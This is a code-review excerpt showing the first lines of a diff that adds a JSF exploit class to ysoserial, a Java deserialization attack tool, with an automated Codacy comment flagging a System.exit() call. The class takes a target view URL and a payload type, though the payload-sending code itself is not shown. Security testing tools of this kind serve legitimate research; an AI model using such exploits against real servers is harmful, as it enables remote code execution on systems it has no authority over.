src/main/java/ysoserial/exploit/JSF.java

```diff
@@ -0,0 +1,98 @@
+package ysoserial.exploit;
+
+
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectOutputStream;
+import java.io.OutputStream;
+import java.net.HttpURLConnection;
+import java.net.URL;
+import java.net.URLConnection;
+import java.net.URLEncoder;
+import java.util.Base64;
+
+import ysoserial.GeneratePayload;
+import ysoserial.payloads.ObjectPayload;
+
+
+/**
+ * @author mbechler
+ *
+ */
+@SuppressWarnings({ "rawtypes", "nls" })
+public class JSF {
+
+    /**
+     * @param args
+     */
+    public static void main ( String[] args ) {
+
+        if ( args.length < 3 ) {
+            System.err.println(JSF.class.getName() + " <view_url> <payload_type> <payload_arg>");
+            System.exit(-1);
```

Comment:
![Codacy](https://www.codacy.com/versioned/images/favicon.png) Issue found: [System.exit() should not be used in J2EE/JEE apps](https://www.codacy.com/app/frohoff/ysoserial/file/2167879596/issues/source?bid=3161887&fileBranchId=3161889#l31)